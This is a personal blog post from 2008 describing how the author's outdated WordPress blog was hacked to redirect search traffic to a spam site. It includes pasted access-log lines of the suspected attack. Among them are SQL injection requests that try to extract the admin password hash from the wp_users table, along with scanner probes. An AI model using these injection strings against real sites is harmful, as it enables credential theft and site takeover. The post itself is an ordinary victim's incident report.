Hacked!

Last week, this blog was hacked. As far as hacks go, it was pretty minor: traffic coming from search engines was redirected to a spammy search engine (your-needs.info) with the query from the Referer header being passed along. Traffic from other links apparently didn’t get redirected.

The hack is described at the wordpress forums and appears to be spreading.

I’ve been running an ancient version of WordPress and had meant to upgrade, but it never seemed urgent; hopefully, I’ve learned that lesson. While upgrading, I decided to upgrade from the default WordPress 1.X theme I was using to this very nice Classy theme by Benedikt Rieke-Benninghaus, though I’ve already started tweaking it.

Thanks to Mike Hochster for telling me that my blog was broken and Brian White for pointing me at easy instructions for keeping WordPress up to date.

For the curious, I suspect the attack corresponded to one of the following log entries:

84.244.147.70 - - [27/May/2008:21:29:19 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-admin/ HTTP/1.1" 302 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 391 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "GET /xmlrpc.php HTTP/1.1" 200 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 941 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=2 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=3 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=4 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=5 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=6 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=7 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:40 -0400] "GET /wp-trackback.php?p=8 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=9 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=10 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=11 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=12 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=13 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=14 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=15 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=16 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=17 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=18 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=19 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=20 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=21 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=22 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=23 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=24 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=25 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:47 -0400] "POST /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"

This entry was posted in Blogging, Web. Bookmark the permalink.